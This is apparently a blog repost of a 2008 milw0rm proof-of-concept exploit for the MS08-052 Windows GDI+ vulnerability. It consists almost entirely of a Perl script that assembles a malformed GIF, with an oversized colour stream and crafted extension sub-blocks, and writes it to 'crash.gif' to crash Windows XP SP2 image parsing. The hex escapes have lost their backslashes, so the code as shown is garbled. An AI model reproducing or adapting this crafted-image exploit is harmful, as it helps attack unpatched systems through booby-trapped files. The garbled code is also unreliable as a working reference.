MS08-052 - MS Windows GDI+ Proof of Concept-夜火博客

2008年10月13日 08:00:43

MS08-052 - MS Windows GDI+ Proof of Concept

MS08-052 - MS Windows GDI+ Proof of Concept

-----------------------------------------------------------------------------------------
Operating System: Windows XP SP2
Gdiplus.dll Version: 5.1.3102.2180

Credit:

John Smith,
Evil Fingers

GIF Template Reference: http://www.sweetscape.com/010editor/templates/files/GIFTemplate.bt

PoC Link: http://www.evilfingers.com/patchTuesday/MS08_052_GDI+_Vulnerability_ver2.txt

http://www.evilfingers.com/patchTuesday/PoC.php
========================================================================

#!/usr/bin/perl # use strict;

my $gif =

"x47x49x46x38x39x61". # GIF header "x65x00x65x00xF7x0Bx0B". # Logical Screen Descriptor # COLOR Stream "x33x33x33x33x33x33x33x33x33x33x33x33x33x33x33x33". "x33x33x33x33x33x33x33x33x33x33x33x33x33x33x33x33". "x33x33x33x33x33x33x33x33x33x33x33x33x33x33x33x33". "x33x33x33x33x33x33x33x33x33x33x33x33x33x33x33x33". "x33x33x33x33x33x33x33x33x33x33x33x33x33x33x33x33". "x33x33x33x33x33x33x33x33x33x33x33x33x33x33x33x33". "x33x33x33x33x33x33x33x33x33x33x33x33x33x33x33x33". "x33x33x33x33x33x33x33x33x33x33x33x33x33x33x33x33". "x33x33x33x33x33x33x33x33x33x33x33x33x33x33x33x33". "x33x33x33x33x33x33x33x33x33x33x33x33x33x33x33x33". "x33x33x33x33x33x33x33x33x33x33x33x33x33x33x33x33". "x33x33x33x33x33x33x33x33x33x33x33x33x33x33x33x33". "x33x33x33x33x33x33x33x33x33x33x33x33x33x33x33x33". "x33x33x33x33x33x33x33x33x33x33x33x33x33x33x33x33". "x33x33x33x33x33x33x33x33x33x33x33x33x33x33x33x33". "x33x33x33x33x33x33x33x33x33x33x33x33x33x33x33x33". "x33x33x33x33x33x33x33x33x33x33x33x33x33x33x33x33". "x33x33x33x33x33x33x33x33x33x33x33x33x33x33x33x33". "x33x33x33x33x33x33x33x33x33x33x33x33x33x33x33x33". "x33x33x33x33x33x33x33x33x33x33x33x33x33x33x33x33". "x33x33x33x33x33x33x33x33x33x33x33x33x33x33x33x33". "x33x33x33x33x33x33x33x33x33x33x33x33x33x33x33x33". "x33x33x33x33x33x33x33x33x33x33x33x33x33x33x33x33". "x33x33x33x33x33x33x33x33x33x33x33x33x33x33x33x33". "x33x33x33x33x33x33x33x33x33x33x33x33x33x33x33x33". "x33x33x33x33x33x33x33x33x33x33x33x33x33x33x33x33". "x33x33x33x33x33x33x33x33x33x33x33x33x33x33x33x33". "x33x33x33x33x33x33x33x33x33x33x33x33x33x33x33x33". "x33x33x33x33x33x33x33x33x33x33x33x33x33x33x33x33". "x33x33x33x33x33x33x33x33x33x33x33x33x33x33x33x33". "x33x33x33x33x33x33x33x33x33x33x33x33x33x33x33x33". "x33x33x33x33x33x33x33x33x33x33x33x33x33x33x33x33". "x33x33x33x33x33x33x33x33x33x33x33x33x33x33x33x33". "x33x33x33x33x33x33x33x33x33x33x33x33x33x33x33x33". "x33x33x33x33x33x33x33x33x33x33x33x33x33x33x33x33". "x33x33x33x33x33x33x33x33x33x33x33x33x33x33x33x33". "x33x33x33x33x33x33x33x33x33x33x33x33x33x33x33x33". "x33x33x33x33x33x33x33x33x33x33x33x33x33x33x33x33". "x33x33x33x33x33x33x33x33x33x33x33x33x33x33x33x33". "x33x33x33x33x33x33x33x33x33x33x33x33x33x33x33x33". "x33x33x33x33x33x33x33x33x33x33x33x33x33x33x33x33". "x33x33x33x33x33x33x33x33x33x33x33x33x33x33x33x33". "x33x33x33x33x33x33x33x33x33x33x33x33x33x33x33x33". "x33x33x33x33x33x33x33x33x33x33x33x33x33x33x33x33". "x33x33x33x33x33x33x33x33x33x33x33x33x33x33x33x33". "x33x33x33x33x33x33x33x33x33x33x33x33x33x33x33x33". "x33x33x33x33x33x33x33x33x33x33x33x33x33x33x33x33". "x33x33x33x33x33x33x33x33x33x33x33x33x33x33x33x33". "x21". ## Extension Introducer 0x21 "x2C". ## Label 0x2C # Data Sub-blocks (1) Size: 21+1 #0 "x21xECx21xECx21xECx21xECx21xECx21xECx21xECx21xEC". "x21xECx21xECx21xECx21xECx21xECx21xECx21xECx21xEC". "x21xEC". #1 "x21xECx21xECx21xECx21xECx21xECx21xECx21xECx21xEC". "x21xECx21xECx21xECx21xECx21xECx21xECx21x2Cx21xEC". "x21xEC". #2 "x21xECx21xECx21xECx21xECx21xECx21xECx21xECx21xEC". "x21xECx21xECx21xECx21xECx21xECx21xECx21xECx21xEC". "x21xEC". #3 "x21xECx21xECx21xECx21xECx21xECx21xECx21xECx21xEC". "x21xECx21xECx21xECx21xECx21xECx21xECx21xECx21xEC". "x21xEC". #4 "x21xECx21xECx21xECx21xECx21xECx21xECx21xECx21xEC". "x21xECx21xECx21xECx21x2Cx21xECx21xECx21xECx21xEC". "x21xEC". #5 "x21xECx21xECx21xECx21xECx21xECx21xECx21xECx21xEC". "x21xECx21xECx21xECx21xECx21xECx21xECx21xECx21xEC". "x21xEC". #6 "x21xECx21xECx21xECx21xECx21xECx21xECx21xECx21xEC". "x21xECx21xECx21xECx21xECx21xECx21xECx21xECx21xEC". "x21xEC". #7 "x21xECx21xECx21xECx21xECx21xECx21xECx21xECx21xEC". "x21x2Cx21xECx21xECx21xECx21xECx21xECx21xECx21xEC". "x21xEC". #8 "x21xECx21xECx21xECx21xECx21xECx21xECx21xECx21xEC". "x21xECx21xECx21xECx21xECx21xECx21xECx21xECx21xEC". "x21xEC". #9 "x21xECx21xECx21xECx21xECx21xECx21xECx21xECx21xEC". "x21xECx21xECx21xECx21xECx21xECx21xECx21xECx21xEC". "x21xEC". #10 "x21xECx21xECx21xECx21xECx21xECx21x2Cx21xECx21xEC". "x21xECx21xECx21xECx21xECx21xECx21xECx21xECx21xEC". "x21xEC". #11 "x21xECx21xECx21xECx21xECx21xECx21xECx21xECx21xEC". "x21xECx21xECx21xECx21xECx21xECx2Cx00x00x00x00x0E". "x01x5A". "x00". ## Terminator "x21". ## Extension Introducer 0x21 "x2C". ## Label 0x2C # Data Sub-blocks (2) Size: EC+1 #0 "xECx61x62x61x62x61x62x61x62x61x62x61x62x61x62x61". "x62x61x62x61x62x61x62x61x62x61x62x61x62x61x62x61". "x62x61x62x61x62x61x62x61x62x61x62x61x62x61x62x61". "x62x61x62x61x62x61x62x61x62x61x62x61x62x61x62x61". "x62x61x62x61x62x61x62x61x62x61x62x61x62x61x62x61". "x62x61x62x61x62x61x62x61x62x61x62x61x62x61x62x61". "x62x61x62x61x62x61x62x61x62x61x62x61x62x61x62x61". "x62x61x62x61x62x61x62x61x62x61x62x61x62x61x62x61". "x62x61x62x61x62x61x62x61x62x61x62x61x62x61x62x61". "x62x61x62x61x62x61x62x61x62x61x62x61x62x61x62x61". "x62x61x62x61x62x61x62x61x62x61x62x61x62x61x62x61". "x62x61x62x61x62x61x62x61x62x61x62x61x62x61x62x61". "x62x61x62x61x62x61x62x61x62x61x62x61x62x61x62x61". "x62x61x62x61x62x61x62x61x62x61x62x61x62x61x62x61". "x62x61x62x61x62x61x62x61x62x61x62x61x62". #1 "xECx61x62x61x62x61x62x61x62x61x62x61x62x61x62x61". "x62x61x62x61x62x61x62x61x62x61x62x61x62x61x62x61". "x62x61x62x61x62x61x62x61x62x61x62x61x62x61x62x61". "x62x61x62x61x62x61x62x61x62x61x62x61x62x61x62x61". "x62x61x62x61x62x61x62x61x62x61x62x61x62x61x62x61". "x62x61x62x61x62x61x62x61x62x61x62x61x62x61x62x61". "x62x61x62x61x62x61x62x61x62x61x62x61x62x61x62x61". "x62x61x62x61x62x61x62x61x62x61x62x61x62x61x62x61". "x62x61x62x61x62x61x62x61x62x61x62x61x62x61x62x61". "x62x61x62x61x62x61x62x61x62x61x62x61x62x61x62x61". "x62x61x62x61x62x61x62x61x62x61x62x61x62x61x62x61". "x62x61x62x61x62x61x62x61x62x61x62x61x62x61x62x61". "x62x61x62x61x62x61x62x61x62x61x62x61x62x61x62x61". "x62x61x62x61x62x61x62x61x62x61x62x61x62x61x62x61". "x62x61x62x61x62x61x62x61x62x61x62x61x62". #2 "xECx61x62x61x62x61x62x61x62x61x62x61x62x61x62x61". "x62x61x62x61x62x61x62x61x62x61x62x61x62x61x62x61". "x62x61x62x61x62x61x62x61x62x61x62x61x62x61x62x61". "x62x61x62x61x62x61x62x61x62x61x62x61x62x61x62x61". "x62x61x62x61x62x61x62x61x62x61x62x61x62x61x62x61". "x62x61x62x61x62x61x62x61x62x61x62x61x62x61x62x61". "x62x61x62x61x62x61x62x61x62x61x62x61x62x61x62x61". "x62x61x62x61x62x61x62x61x62x61x62x61x62x61x62x61". "x62x61x62x61x62x61x62x61x62x61x62x61x62x61x62x61". "x62x61x62x61x62x61x62x61x62x61x62x61x62x61x62x61". "x62x61x62x61x62x61x62x61x62x61x62x61x62x61x62x61". "x62x61x62x61x62x61x62x61x62x61x62x61x62x61x62x61". "x62x61x62x61x62x61x62x61x62x61x62x61x62x61x62x61". "x62x61x62x61x62x61x62x61x62x61x62x61x62x61x62x61". "x62x61x62x61x62x61x62x61x62x61x62x61x62". #3 "xECx61x62x61x62x61x62x61x62x61x62x61x62x61x62x61". "x62x61x62x61x62x61x62x61x62x61x62x61x62x61x62x61". "x62x61x62x61x62x61x62x61x62x61x62x61x62x61x62x61". "x62x61x62x61x62x61x62x61x62x61x62x61x62x61x62x61". "x62x61x62x61x62x61x62x61x62x61x62x61x62x61x62x61". "x62x61x62x61x62x61x62x61x62x61x62x61x62x61x62x61". "x62x61x62x61x62x61x62x61x62x61x62x61x62x61x62x61". "x62x61x62x61x62x61x62x61x62x61x62x61x62x61x62x61". "x62x61x62x61x62x61x62x61x62x61x62x61x62x61x62x61". "x62x61x62x61x62x61x62x61x62x61x62x61x62x61x62x61". "x62x61x62x61x62x61x62x61x62x61x62x61x62x61x62x61". "x62x61x62x61x62x61x62x61x62x61x62x61x62x61x62x61". "x62x61x62x61x62x61x62x61x62x61x62x61x62x61x62x61". "x62x61x62x61x62x61x62x61x62x61x62x61x62x61x62x61". "x62x61x62x61x62x61x62x61x62x61x62x61x62". #4 "xECx61x62x61x62x61x62x61x62x61x62x61x62x61x62x61". "x62x61x62x61x62x61x62x61x62x61x62x61x62x61x62x61". "x62x61x62x61x62x61x62x61x62x61x62x61x62x61x62x61". "x62x61x62x61x62x61x62x61x62x61x62x61x62x61x62x61". "x62x61x62x61x62x61x62x61x62x61x62x61x62x61x62x61". "x62x61x62x61x62x61x62x61x62x61x62x61x62x61x62x61". "x62x61x62x61x62x61x62x61x62x61x62x61x62x61x62x61". "x62x61x62x61x62x61x62x61x62x61x62x61x62x61x62x61". "x62x61x62x61x62x61x62x61x62x61x62x61x62x61x62x61". "x62x61x62x61x62x61x62x61x62x61x62x61x62x61x62x61". "x62x61x62x61x62x61x62x61x62x61x62x61x62x61x62x61". "x62x61x62x61x62x61x62x61x62x61x62x61x62x61x62x61". "x62x61x62x61x62x61x62x61x62x61x62x61x62x61x62x61". "x62x61x62x61x62x61x62x61x62x61x62x61x62x61x62x61". "x62x61x62x61x62x61x62x61x62x61x62x61x62". "x00". # Terminator "x3B". # Trailer

open(out, "> crash.gif"); binmode(out); print (out $gif); close(out);

# milw0rm.com [2008-10-09]